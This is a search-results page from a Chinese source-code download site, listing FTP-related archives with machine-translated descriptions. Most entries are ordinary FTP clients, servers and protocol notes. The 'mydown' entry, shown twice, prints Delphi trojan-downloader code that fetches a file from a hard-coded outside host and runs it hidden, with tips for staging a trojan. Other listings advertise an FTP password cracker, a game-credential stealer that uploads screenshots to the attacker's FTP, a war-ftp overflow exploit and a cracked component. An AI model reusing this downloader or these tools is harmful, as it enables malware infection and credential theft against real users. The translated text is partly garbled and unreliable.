Welcome![Sign In][Sign Up]
Location:
Search - ftp r

Search list

[WinSock-NDISmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R *. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http : / / www.jm-my.com/ip2.txt / / read you want to download the website l : = c : / downpage.txt / / read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1436 | Author: 韩冰 | Hits:

[Other0107-exploits

Description: 一个FTP密码破解程序的源代码-An FTP password cracking program s source code
Platform: | Size: 180224 | Author: 刘斌 | Hits:

[Internet-Networkmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1024 | Author: 韩冰 | Hits:

[WEB Codefpv

Description: FlashPicViewer(FPV)是一个Flash界面的相册程序,强大的Skin设定,让您随心所欲的自定义相册的样式,布局,内部效果,大小等等可见的设置,让你个性的展示自己的图片. 基于Flash的强大能力,可读取任何域内的图片(只要有图片地址),附带的<网易相册读取工具>可批量添加网易相册内的图片,让你无需为图片存放空间发愁,网易相册提供无限空间以及1000M的网络连接. 生成静态XML格式数据,最大限度地减轻服务器压力和浏览者的等待时间,生成后的整个相册更能适用于任何空间,让你不必为空间脚本支持而烦恼. 强大的后台功能为你提供批量添加本地图片(用FTP上传后批量读取),自动读取(目录内图片增加,前台自动更显示),自动生成缩略图等等相册功能. FlashPicViewer 为你带来新的图片发布&浏览感受. -FlashPicViewer (FPV) is a Flash interface album procedures, Skin powerful settings so that you attained the album, since the definition of the format, layout, internal effects, Visibility size, and so on the establishment, let you display their individuality of the pictures. Based on the powerful capabilities of Flash, can be read within any pictures (as long as a caption address), the fringe
Platform: | Size: 15851520 | Author: tcbaby | Hits:

[Embeded Linuxtftp_client

Description: tftp 客户端程序,运行在嵌入式操作系统中-tftp client program, run in the embedded operating system
Platform: | Size: 3072 | Author: 雷雨 | Hits:

[Program docRFC_Protocol

Description: 这是常见的几种RFC协议文档。包含TCP,UDP,Telnet,FTP等协议文档-This is a common agreement of several RFC documents. Includes TCP, UDP, Telnet, FTP, such as the agreement document
Platform: | Size: 82944 | Author: 刘名 | Hits:

[Internet-NetworkVB.FTP2.Rar

Description: FTP 多线程断点续传下载文件,VB比较详细-FTP multi-threaded HTTP download a file, VB more detailed
Platform: | Size: 254976 | Author: cobus | Hits:

[Process-ThreadSimpleFTP20_src

Description: 基于多线程的FTP服务器开这个自行设计的FTP服务器其基本模式为C/S 模式,那么宏观的C/S模式如下图-Based on multi-threaded FTP server designed to open the FTP server of its basic model C/S mode, then a macro-C/S model as illustrated
Platform: | Size: 46080 | Author: namename | Hits:

[OtherFTPServer

Description: FTP服务器,需要客户端来配合收发文件,可以通过共享目录看到服务器端的所有文件-FTP server, the client required to cope with the transceiver documents can be shared directory to see the server-side all documents
Platform: | Size: 26624 | Author: 123 | Hits:

[Internet-Networkftplib-3.1-1-linux

Description: linux下r的FTP源码,已经测试通过!-linux ftp
Platform: | Size: 102400 | Author: 张永旺 | Hits:

[Internet-NetworkFTPServer

Description: 具有ftp服务端所有的基本功能,界面友好,具有典型的学习价值-Ftp server with all the basic functions, user-friendly, with a typical value of studying
Platform: | Size: 111616 | Author: sdss | Hits:

[Ftp ClientFTP_document

Description: FTP协议采用一系列简单的协议来完成文件传输的各种任务,在发送命令的时候,总是在命令的最后加上一个回车换行符,在VB中可以用“vbcrlf”来实现,vc中以“\r\n”表示。以下的命令是从Postel和Reynolds所著的RFC 929修改而来,如果读者想查看详细内容,可以参见英文版RFC 929。注意以下出现地标志符CRLF表示的是回车符号,即相当于VC中的“\r\n”。-FTP protocol uses a series of simple file transfer protocol to complete the various tasks, in the send commands when the command is always the last to add a carriage return line feed in VB you can use " vbcrlf" to achieve, vc in order to " \ r \ n" , said. The following command is written by Postel and Reynolds modified from RFC 929, if readers want to see the details, you can see the English version of RFC 929. Note of the following occur in that the identifier CRLF carriage return symbols, which is equivalent to VC in the " \ r \ n" .
Platform: | Size: 21504 | Author: lzh | Hits:

[Windows DevelopDNF

Description: VB程序编写盗取DNF密保。并且自动上传到你的FTP空间,原理:判断进程里是否有DNF.exe 后再截图。截图后自动将图片压缩,再自动上传到你的FTP-VB programmers to steal secret DNF Paul. And automatically upload to your FTP space, Principle: the process to determine whether there was any DNF.exe after shots. Screenshot automatically compress the picture, and then automatically uploaded to your FTP
Platform: | Size: 10240 | Author: 马海华 | Hits:

[Delphi VCLWEBCOPY

Description: 通过WEB 复制文件的DELPHI 控件-TMS.WEBCOPY.1.6.DelphiRetail-SKYDANCER Supplier : Team SKYDANCER Rlz date : 01/10/2006 Packager : Team SKYDANCER Archives : 01x0.5mb Cracker : non Protec. : non TWebCopy uses the Wininet API to load the selected files via http or ftp from Intranet or Internet sites or can copy files by UNC name over the network. It features a progress/cancel dialog and threaded execution. (ASP script available to handle POST based HTTP uploads) WebCopy can be configured to retrieve automatically only newer files w.r.t. to a configurable date. Files to copy over the web can be easily set at design time using a Items collection or programmatically : HTTP: with WebCopy.Items.Add do begin URL := http://www.tmssoftware.com/webcopy.zip Protocol := wpHTTP FileDate := EncodeDate(2002,3,18) CopyNewerOnly := true TargetDir := c:\temp end FTP: with WebCopy.Items.Add do begin FTPHost := ftp.tms
Platform: | Size: 27648 | Author: newsun | Hits:

[AI-NN-PRSGA

Description: 这是一个非常简单的遗传算法源代码,是由Denis Cormier (North Carolina State University)开发的,Sita S.Raghavan (University of North Carolina at Charlotte)修正。代码保证尽可能少,实际上也不必查错。对一特定的应用修正此代码,用户只需改变常数的定义并且定义“评价函数”即可。注意代码 的设计是求最大值,其中的目标函数只能取正值;且函数值和个体的适应值之间没有区别。该系统使用比率选择、精华模型、单点杂交和均匀变异。如果用 Gaussian变异替换均匀变异,可能得到更好的效果。代码没有任何图形,甚至也没有屏幕输出,主要是保证在平台之间的高可移植性。读者可以从ftp.uncc.edu, 目录 coe/evol中的文件prog.c中获得。要求输入的文件应该命名为‘gadata.txt’;系统产生的输出文件为‘galog.txt’。输入的 文件由几行组成:数目对应于变量数。且每一行提供次序——对应于变量的上下界。如第一行为第一个变量提供上下界,第二行为第二个变量提供上下界,等等。 -This is a very simple genetic algorithm is Denis Cormier source of Carolina re (State) development, Sita leads S.R aghavan (of Carolina at leads, where re. Code that is actually less as far as possible, don t find fault. For a particular application of this code, the user need revision of the constant change and define "evaluation function definition of". Note the design code for maximum, which is the objective function can take positive, And the function of the individual value and no difference between fitness. This system USES ratio, essence model, single hybridization and uniform variation. If use uniform variation and variation of Gaussian replacement may get better effect. Code without any graphics, nor even screen output, mainly is the guarantee of the platform between high portability. Readers can from the FTP uncc. J, directory coe/evol edu files in prog. C. The documents required input should be named "j" rather gadata System to produce output file for galog. J TXT Input f
Platform: | Size: 8192 | Author: hua gong | Hits:

[Ftp ServerFTPServer

Description: 使用C#在本地计算机创建一个FTP服务器。-FTP service C#
Platform: | Size: 40960 | Author: 李波 | Hits:

[WEB CodePHP

Description: zip10.php 在线压缩程序 unzip10.php 在线解压程序 默认密码 123456 ---------------------------------------------------------------------------------- zip10.php使用方法: 使用方法:输入验证密码后,勾选需要压缩的目录或文件然后点击“开始压缩即可”。 压缩的结果保留原目录结构。★ 将源代码打包成ZIP格式 ★ ---------------------------------------------------------------------------------- unzip10.php使用方法: 使用方法:把源代码打包ZIP文件通过FTP上传到本文件相同的目录下, 选择ZIP文件或点击“浏览...”上传源代码打包ZIP文件。 解压的结果保留原来的目录结构。★ 必需将源代码打包成ZIP格式 ★ ---------------------------------------------------------------------------------- 以下内容没必要关注,设置属性可在FTP里完成. LINX主机 解压后设置目录属性(有的程序是777,有的是755) WIN主机 不需要设置目录属性,直接解压即可。 (如新建一目录,,设置为777属性,直接把文件解压放在目录里面)-zip10.php-line compression program unzip10.php online decompressor default password 123456---------------------------------------------------------------------------------- zip10. php Usage: Usage: Enter the verification password, check the need to compress the directory or file and click \u0026quot Start compression can be.\u0026quot
Platform: | Size: 9216 | Author: 阿峰 | Hits:

[WEB CodeWebFTP_cngr

Description: WebFTP为浩天科技开发的PHP在线文件管理系统,系统采用Ajax+Json进行数据通信,毫秒级的响应速度,强大的文件管理功能足以媲美专业的FTP软件;高度集中的操作接口,将系统BUG、漏洞出现几率降到最低,便捷的权限拦截方案;全平台兼容性:Win(IIS+Apache)、Linux(Apache) 支持中英文目录名及文件名; 功能简介 目录:剪切、复制、粘贴、删除、压缩、打包下载、权限设置、目录属性查看... 文件:剪切、复制、粘贴、删除、压缩(ZIP解压、预览)、打包下载、权限设置、代码编辑(支持15种语言语法高亮)... 其他:图片预览、列表视图风格切换、文件列表排序、常用快捷键支持、批量文件上传... 快捷键: //Ctrl+a 全选/反选 //Ctrl+r 刷新 //Ctrl+s 列表风格切换 //Ctrl+q 退出 //Ctrl+y 远程模式 //Ctrl+x 全局剪切 //Ctrl+c 全局复制 //Ctrl+v 全局粘贴 //Ctrl+v 全局粘贴 //Alt+n 新建目录 //Alt+m 新建文件 稍加优化及改造完全可以替代IDC服务商的浏览器FTP,作为在线的文件管理软件。 使用说明 1、初始账号 超级管理员 admin 密码 admin 受限账号 demo 密码 demo-WebFTP Tian science and technology development of the PHP online document management system, the system uses Ajax+Json for data communications, millisecond response speed, powerful file management function comparable to those of professional FTP software highly centralized operation interface, the system BUG, the holes appear risk to a minimum, convenient access interception scheme the platform compatibility: Win ( IIS+Apache ), Linux ( Apache ) in support of the English directory name and file name Function introduction Directory: cut, copy & paste, delete, compressed, packaged download, permission settings, directory attributes view ... File: cut, copy, paste, delete, compression ( ZIP decompression, preview ), download, permission set, code editing ( with support for 15 languages syntax highlighting ) ... Other: preview picture, list view style switch, file list sorting, commonly used shortcut key support, batch file upload ... Shortcut keys: //Ctrl+a select/des
Platform: | Size: 724992 | Author: your name | Hits:

[OS programOverflow

Description: war-ftp 1.65存在缓冲区溢出漏洞:发送长度超过480B的用户名给war-ftp服务器就可以触发漏洞(即USER longString\n\r),溢出之后ESP指令寄存器的内容包含了longString中的部分内容。远程攻击者可以利用此漏洞以应用程序进程权限执行任意指令。-war-ftp 1.65 a buffer overflow vulnerability: send more than 480B username length to the war-ftp server can trigger the vulnerability (ie the the USER longString \ n \ r), the overflow after the the ESP instruction register contains part of the contents of the longString. Remote attacker could exploit this vulnerability to execute arbitrary commands in the application process rights.
Platform: | Size: 1186816 | Author: zyxlive | Hits:

[Windows Developsimhash-f624c65.tar

Description: simhash.c /* Bibliography * Mark Manasse * Microsoft Research Silicon Valley * Finding similar things quickly in large collections * http://research.microsoft.com/research/sv/PageTurner/similarity.htm * * Andrei Z. Broder * On the resemblance and containment of documents * In Compression and Complexity of Sequences (SEQUENCES 97), * pages 21-29. IEEE Computer Society, 1998 * ftp://ftp.digital.com/pub/DEC/SRC/publications/broder/ * positano-final-wpnums.pdf * * Andrei Z. Broder * Some applications of Rabin s fingerprinting method * Published in R. Capocelli, A. De Santis, U. Vaccaro eds. * Sequences II: Methods in Communications, Security, and * Computer Science, Springer-Verlag, 1993. * http://athos.rutgers.edu/~muthu/broder.ps-simhash.c /* Bibliography * * Mark Manasse * Microsoft Research Silicon Valley * Finding similar things quickly in large collections * http://research.microsoft.com/research/sv/PageTurner/similarity.htm * * Andrei Z. Broder * On the resemblance and containment of documents * In Compression and Complexity of Sequences (SEQUENCES 97), * pages 21-29. IEEE Computer Society, 1998 * ftp://ftp.digital.com/pub/DEC/SRC/publications/broder/ * positano-final-wpnums.pdf * * Andrei Z. Broder * Some applications of Rabin s fingerprinting method * Published in R. Capocelli, A. De Santis, U. Vaccaro eds. * Sequences II: Methods in Communications, Security, and * Computer Science, Springer-Verlag, 1993. * http://athos.rutgers.edu/~muthu/broder.ps
Platform: | Size: 11264 | Author: daniel | Hits:
« 12 »

CodeBus www.codebus.net